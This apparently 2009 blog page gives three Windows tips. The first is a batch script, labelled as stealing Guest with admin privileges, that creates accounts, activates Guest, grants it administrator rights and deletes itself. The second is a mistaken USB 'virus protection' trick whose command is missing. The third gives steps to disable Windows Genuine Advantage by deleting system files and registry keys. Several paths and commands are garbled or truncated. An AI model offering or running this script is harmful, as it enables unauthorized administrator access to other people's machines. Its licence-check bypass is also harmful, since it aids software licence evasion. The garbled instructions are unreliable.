Monday, October 5, 2009


Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.
Steal "GUEST" with Admin privileges........

echo off
title Please wait...
user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as "Guest2admin.bat"then u can double click the file to execute or run in the works... ~ Cheers ~


Today every one is affraid of pen drive.Every computer user consider it as a monster. Here is something that could change your attitude towards pendrive. Here i am going to show you how to make your pendrive free from virus. First, you have to know how much free space is left on the USB drive. Plug in the drive, go to My Computer, right click on the drive letter and select Properties.Take note of the “Free space” that is in bytes.My USB drive has 1,300,594,688 free space, so I will need to create a dummy file that has the exact file size.The best and easiest way is to use fsutil, a command line tool included in windows. Open up command prompt from Start Menu > Accessories and type the following command:You will see that your USB flash drive’s LED is blinking meaning the file is being created.Now my pendrive has 0 free space and virus won,t be able to get in. You can change 1300594688 to the size that you want in bytes. F: is the letter of my USB flash drive and IamDummy is the file name.When you want to copy files into USB removable drive, simply delete dummy file.When you’re done ,create the dummy file again using the fsutil command.If you’re looking for a graphical tool to create dummy fake files, here are a few that I found. Some are slower, and some with NTFS restriction, I hope you find this useful.


The fix works a treat.

1.C:Documents and SettingsAll UsersApplication DataWindows Genuine Advantagedata

inside you will find a file called Data.dat open that file with notepad and
delete all the stuff in it… now save the file and set it as read only and restart pc but in SAFE mode ** Yes, this step is required ** ** Will NOT immediately solve problem until rest of steps completed **
Now go to c:windows system32 folder: MUST be in safemode

wgalogon.dll ** You CANNOT delete this file. RENAME it to wgalogon.bbb ***
spmgs.dll ** This is a spelling error. File is actually spmsg.dll. RENAME it to **
wgatray.exe *** DELETE this file ***

Now go to C:WINDOWSSoftwareDistributionDownload and DELETE the following folder


REBOOT & all should be resolved
End the process wgatray.exe in Windows TaskManager and restart Windows XP in safe mode. Now delete the following files:

Delete WgaTray.exe from c:windowssystem32
Delete WgaTray.exe from c:windowssystem32dllcache

Start Windows Registry editor and delete the folder "WGALOGON" located in the following location:
HKEY_LOCAL_MACHINESOFTWAREMicrosoft Windows NTCurrentVersionWinlogonNotify. Delete all references in your registry to WgaTray.exe

Another alternative suggest that three files are installed Windows XP System Folder:


The wgatray.exe process makes the check for genuine windows software. You can disable WGA by removing the execute bit on WgaLogon.dll. That way, winlogon can't call it as a notification package at boot, and since WgaLogon is responsible for running and maintaining WgaTray.exe, no more tray popups either.

To change the execute bit of WgaLogon.dll, first turn off Simple File Sharing. Now right click the file in Windows Explorer and open the Security Tab. Hit the Advanced button, uncheck the Inherit box at the bottom, hit the Copy button, then hit OK. Go through each listed user/group and remove the "Read & Execute" permission for that file, leaving the "Read" permission as-is.

Hit OK to apply the permission changes and close the file properties dialog. Restart the machine. You can now turn "Use simple file sharing" back on, if you want.

A third alternative posted on the internet suggest that users clear the content of file data.dat located in the following directory:
C:Documents and SettingsAll UsersApplication DataWindows Genuine Advantagedata